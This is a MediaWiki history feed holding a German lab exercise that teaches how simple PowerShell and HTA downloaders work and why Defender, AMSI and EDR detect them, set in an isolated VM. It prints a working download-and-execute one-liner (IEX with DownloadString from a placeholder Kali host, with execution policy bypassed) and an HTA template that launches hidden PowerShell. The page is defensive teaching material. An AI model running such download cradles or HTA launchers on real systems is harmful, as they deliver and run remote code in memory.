<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=PowerShell_%2F_HTA_Payload_Demonstration_%28Lab_Only%29</id>
	<title>PowerShell / HTA Payload Demonstration (Lab Only) - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=PowerShell_%2F_HTA_Payload_Demonstration_%28Lab_Only%29"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=PowerShell_/_HTA_Payload_Demonstration_(Lab_Only)&amp;action=history"/>
	<updated>2026-05-14T19:32:09Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=PowerShell_/_HTA_Payload_Demonstration_(Lab_Only)&amp;diff=66801&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „==Ziel der Übung== *Verständnis, wie einfache Downloader technisch funktionieren *Erkennen, warum Windows Defender anschlägt *Einordnung der Rolle von EDR-S…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=PowerShell_/_HTA_Payload_Demonstration_(Lab_Only)&amp;diff=66801&amp;oldid=prev"/>
		<updated>2026-02-11T16:22:22Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „==Ziel der Übung== *Verständnis, wie einfache Downloader technisch funktionieren *Erkennen, warum Windows Defender anschlägt *Einordnung der Rolle von EDR-S…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==Ziel der Übung==&lt;br /&gt;
*Verständnis, wie einfache Downloader technisch funktionieren&lt;br /&gt;
*Erkennen, warum Windows Defender anschlägt&lt;br /&gt;
*Einordnung der Rolle von EDR-Systemen&lt;br /&gt;
*Demonstration ausschließlich in isolierter Test-VM ohne Internetzugang&lt;br /&gt;
&lt;br /&gt;
==Lab-Aufbau==&lt;br /&gt;
*Angreifer-VM: Kali Linux&lt;br /&gt;
*Opfer-VM: Windows 10/11 mit aktiviertem Defender&lt;br /&gt;
*Netzwerk: Internes Host-Only-Netz&lt;br /&gt;
*Kein Zugriff ins Internet&lt;br /&gt;
&lt;br /&gt;
==Schritt 1 – Test-Webserver vorbereiten (Kali)==&lt;br /&gt;
*mkdir /tmp/xinux-demo&lt;br /&gt;
*cd /tmp/xinux-demo&lt;br /&gt;
*echo &amp;quot;Write-Output 'Download erfolgreich – Demo Script ausgeführt'&amp;quot; &amp;gt; demo.ps1&lt;br /&gt;
*python3 -m http.server 8080&lt;br /&gt;
&lt;br /&gt;
*Der Webserver stellt eine harmlose PowerShell-Datei bereit.&lt;br /&gt;
*Keine Schadfunktion – nur Ausgabe einer Meldung.&lt;br /&gt;
&lt;br /&gt;
==Schritt 2 – Einfacher PowerShell-Downloader (Windows VM)==&lt;br /&gt;
&lt;br /&gt;
*Auf der Windows-VM PowerShell als normaler Benutzer starten.&lt;br /&gt;
&lt;br /&gt;
*Test-Download ausführen:&lt;br /&gt;
 powershell -ExecutionPolicy Bypass -Command &amp;quot;IEX (New-Object Net.WebClient).DownloadString('http://&amp;lt;KALI-IP&amp;gt;:8080/demo.ps1')&amp;quot;&lt;br /&gt;
&lt;br /&gt;
*Erwartung:&lt;br /&gt;
*Script wird geladen und ausgeführt.&lt;br /&gt;
*Konsole zeigt die Testmeldung an.&lt;br /&gt;
&lt;br /&gt;
==Technische Erklärung==&lt;br /&gt;
*New-Object Net.WebClient erzeugt HTTP-Client&lt;br /&gt;
*DownloadString lädt Script als Text&lt;br /&gt;
*IEX (Invoke-Expression) führt den geladenen Code direkt im Speicher aus&lt;br /&gt;
*Keine Datei wird zwingend auf Disk gespeichert&lt;br /&gt;
&lt;br /&gt;
==Warum Defender Alarm schlägt==&lt;br /&gt;
*Heuristische Erkennung: Kombination aus Download + IEX ist verdächtig&lt;br /&gt;
*Signaturbasierte Mustererkennung für typische Downloader-Techniken&lt;br /&gt;
*AMSI (Antimalware Scan Interface) scannt Script-Inhalte vor Ausführung&lt;br /&gt;
*Verhaltensanalyse erkennt Netzwerk + Script-Ausführung&lt;br /&gt;
&lt;br /&gt;
==Demonstration Defender==&lt;br /&gt;
*Windows-Sicherheit öffnen&lt;br /&gt;
*Viren- &amp;amp; Bedrohungsschutz → Schutzverlauf&lt;br /&gt;
*Erkannte Bedrohung analysieren&lt;br /&gt;
*Eintrag prüfen: Script oder verdächtiger Befehl&lt;br /&gt;
&lt;br /&gt;
==Variante mit HTA-Datei (nur Konzept)==&lt;br /&gt;
&lt;br /&gt;
*Eine HTA-Datei ist eine HTML-Anwendung, die über mshta.exe ausgeführt wird.&lt;br /&gt;
*HTA kann eingebettetes VBScript oder JScript enthalten.&lt;br /&gt;
*Beim Start kann sie PowerShell aufrufen.&lt;br /&gt;
&lt;br /&gt;
*Beispielstruktur einer HTA-Datei:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;lt;script language=&amp;quot;VBScript&amp;quot;&amp;gt;&lt;br /&gt;
Set objShell = CreateObject(&amp;quot;Wscript.Shell&amp;quot;)&lt;br /&gt;
objShell.Run &amp;quot;powershell -Command Write-Output 'HTA gestartet'&amp;quot;,0&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*Speichern als demo.hta&lt;br /&gt;
*Start über Doppelklick&lt;br /&gt;
&lt;br /&gt;
==Warum HTA problematisch ist==&lt;br /&gt;
*mshta.exe ist signierte Windows-Komponente&lt;br /&gt;
*Wird häufig für sogenannte &amp;quot;Living off the Land&amp;quot;-Techniken missbraucht&lt;br /&gt;
*EDR erkennt Prozessketten:&lt;br /&gt;
 mshta.exe → powershell.exe → Netzwerkzugriff&lt;br /&gt;
&lt;br /&gt;
==Rolle von EDR==&lt;br /&gt;
*Klassische AV: Signatur + einfache Heuristik&lt;br /&gt;
*EDR: Prozessüberwachung + Telemetrie&lt;br /&gt;
*Erkennt:&lt;br /&gt;
** Eltern-Kind-Prozess-Beziehungen&lt;br /&gt;
** Netzwerkverbindungen&lt;br /&gt;
** Speicherbasierte Ausführung&lt;br /&gt;
** Anomales Benutzerverhalten&lt;br /&gt;
&lt;br /&gt;
==Didaktischer Kern==&lt;br /&gt;
*Downloader selbst ist technisch trivial&lt;br /&gt;
*Gefährlich wird es durch Kombination aus:&lt;br /&gt;
** Social Engineering&lt;br /&gt;
** legitimen Systemtools&lt;br /&gt;
** Speicherbasierter Ausführung&lt;br /&gt;
*Moderne Verteidigung analysiert Verhalten, nicht nur Dateien&lt;br /&gt;
&lt;br /&gt;
==Abschlussdiskussion==&lt;br /&gt;
*Warum Makros, HTA und PowerShell in Unternehmen eingeschränkt werden&lt;br /&gt;
*Warum Application Control (z. B. AppLocker) sinnvoll ist&lt;br /&gt;
*Warum Awareness-Schulung entscheidend bleibt&lt;br /&gt;
&lt;br /&gt;
==Wichtiger Hinweis==&lt;br /&gt;
*Nur in isolierter VM durchführen&lt;br /&gt;
*Keine Tests gegen produktive Systeme&lt;br /&gt;
*Keine Internet-Ziele verwenden&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>